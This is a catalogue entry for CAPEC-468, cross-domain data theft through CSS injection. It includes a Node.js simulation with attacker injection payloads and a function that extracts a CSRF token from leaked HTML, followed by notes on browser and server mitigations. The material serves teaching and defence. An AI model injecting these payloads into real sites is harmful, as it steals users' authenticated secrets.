
CAPEC-468: Generic Cross-Browser Cross-Domain Theft

Abstraction
Standard
Status
Draft
Severity
Medium

Description

An attacker uses Cascading Style Sheets (CSS) injection to steal data cross-domain from the victim's browser. The attack abuses two behaviours that the standards governing CSS loading historically allowed:

1. The browser sends cookies on any stylesheet load, including cross-domain loads, so a victim page fetched as a stylesheet from an attacker-controlled page is returned with the victim's authenticated content.
2. When parsing the returned CSS, the browser ignores any data that does not make sense until the CSS parser finds a valid CSS descriptor, so an HTML page carrying an attacker-injected fragment ahead of a secret is accepted as a stylesheet whose rule body contains that secret.
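The two behaviours above, simulated end to end in Node.js. This is an added example, not MITRE CAPEC text and not code from any browser: the victim search page, its reflected parameters `q` and `p`, the token value, the toy lenient CSS parser and the simplified stylesheet-acceptance rule are all assumptions constructed for illustration.

```javascript
// Added example (not MITRE CAPEC text): a Node.js simulation of CAPEC-468.
// The victim page, the reflected parameters `q` and `p`, the token value and
// the toy "lenient" CSS parser are all constructed here for illustration.

// Constructed victim response: a search page that reflects two request
// parameters into the HTML without escaping, with a CSRF token between them.
function victimPage(q, p) {
  return '<html><head><title>Search: ' + q + '</title></head>' +
    '<body><form action="/transfer">' +
    '<input type="hidden" name="csrf" value="9f3a7c2d1e"></form>' +
    '<p>Showing ' + p + '</p></body></html>';
}

// Attacker payloads. `{}` turns the junk before the first brace into one
// (invalid, silently dropped) rule; `*{font-family:'` then opens a real rule
// whose string value swallows everything up to the closing `'}`.
const PAYLOAD = { q: "{}*{font-family:'", p: "'}" };

// Advance past one character, or past a whole quoted string if one starts here.
function skipString(text, i) {
  const quote = text[i];
  if (quote !== "'" && quote !== '"') return i + 1;
  let j = i + 1;
  while (j < text.length && text[j] !== quote) j += text[j] === '\\' ? 2 : 1;
  return Math.min(j + 1, text.length);
}

function splitOutsideStrings(text, sep) {
  const parts = [];
  let start = 0;
  for (let i = 0; i < text.length; ) {
    if (text[i] === sep) { parts.push(text.slice(start, i)); start = ++i; }
    else i = skipString(text, i);
  }
  parts.push(text.slice(start));
  return parts;
}

// Deliberately small selector grammar: `*`, type, class and id selectors
// joined by combinators. Anything else (such as leaked HTML) is not a selector.
const SIMPLE_SELECTOR = /^(\*|[A-Za-z][\w-]*|[.#][\w-]+)(\s*[ ,>+~]\s*(\*|[A-Za-z][\w-]*|[.#][\w-]+))*$/;

function parseDeclarations(body) {
  const decls = {};
  for (const part of splitOutsideStrings(body, ';')) {
    const colon = part.indexOf(':');
    if (colon < 0) continue;
    const prop = part.slice(0, colon).trim().toLowerCase();
    let value = part.slice(colon + 1).trim();
    const q = value[0];
    if ((q === "'" || q === '"') && value.length >= 2 && value[value.length - 1] === q) value = value.slice(1, -1);
    if (prop) decls[prop] = value;
  }
  return decls;
}

// Toy model of the error-tolerant parsing in step 2 of the description:
// each rule is "prelude { block }"; a rule whose prelude is not a selector is
// dropped without aborting the parse, and parsing resumes after its block.
function parseLenientCss(text) {
  const rules = [];
  let i = 0;
  while (i < text.length) {
    const preludeStart = i;
    while (i < text.length && text[i] !== '{') i = skipString(text, i);
    if (i >= text.length) break;                    // trailing junk with no block
    const prelude = text.slice(preludeStart, i).trim();
    const blockStart = i;
    let depth = 0;
    do {
      if (text[i] === '{') depth++;
      else if (text[i] === '}') depth--;
      i = skipString(text, i);
    } while (i < text.length && depth > 0);
    const body = text.slice(blockStart + 1, depth === 0 ? i - 1 : i);
    if (SIMPLE_SELECTOR.test(prelude)) rules.push({ selector: prelude, declarations: parseDeclarations(body) });
  }
  return rules;
}

// Attacker side: in a real browser this would read the applied value through
// document.styleSheets or getComputedStyle; here the "stylesheet" is the victim
// HTML that the cookie-bearing cross-domain load (step 1) returned.
function stealToken(stylesheetText) {
  const rule = parseLenientCss(stylesheetText).find(r => r.selector === '*' && 'font-family' in r.declarations);
  if (!rule) return null;
  const m = /name="csrf" value="([^"]+)"/.exec(rule.declarations['font-family']);
  return m ? m[1] : null;
}

// Simplified model of the mitigation modern browsers ship against this pattern:
// a stylesheet fetched cross-origin is applied only if the response declares
// Content-Type text/css; same-origin sheets keep the old leniency in quirks mode.
function browserAppliesStylesheet({ contentType, crossOrigin, quirksMode }) {
  if (/^\s*text\/css\s*(;|$)/i.test(contentType || '')) return true;
  return !crossOrigin && Boolean(quirksMode);
}

const html = victimPage(PAYLOAD.q, PAYLOAD.p);
console.log('stolen token:', stealToken(html));
console.log('applied by a current browser:',
  browserAppliesStylesheet({ contentType: 'text/html; charset=utf-8', crossOrigin: true, quirksMode: true }));
```

Run it with `node`. The `{}` prefix is what makes step 2 work for the attacker: without it the leaked HTML becomes the prelude of the real rule and the parser drops that rule along with the junk. Current browsers refuse to apply a cross-origin response as a stylesheet unless it is served as `text/css` (and `X-Content-Type-Options: nosniff` makes that check unconditional), and cookies marked `SameSite=Lax` or `Strict` are not sent on a cross-site `<link>` fetch, so step 1 fails as well; the server-side fix that removes the injection itself is context-correct output encoding, which is what the related CWEs on this page describe.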

Related weaknesses (4)

CWE-707, CWE-149, CWE-177, CWE-838

Related attack patterns (1)

CAPEC-242 (ChildOf)

Exploits (4)

Type      Target                                                      Confidence  Tier
Weakness  Inappropriate Encoding for Output Context (CWE-838)         100%        live
Weakness  Improper Neutralization (CWE-707)                           100%        live
Weakness  Improper Neutralization of Quoting Syntax (CWE-149)         100%        live
Weakness  Improper Handling of URL Encoding (Hex Encoding) (CWE-177)  100%        live

Related by meaning (6)

Nearest entities by semantic similarity across the cs-graph corpus.

CAPEC: Cross Site Tracing
CAPEC: Cross Site Request Forgery
CAPEC: Cross-Site Scripting (XSS)
CAPEC: DOM-Based XSS
CAPEC: Cross Site Identification
CAPEC: XSS Through HTTP Headers

Sourced from MITRE CAPEC. Curated by Adam Lundqvist, SQUR.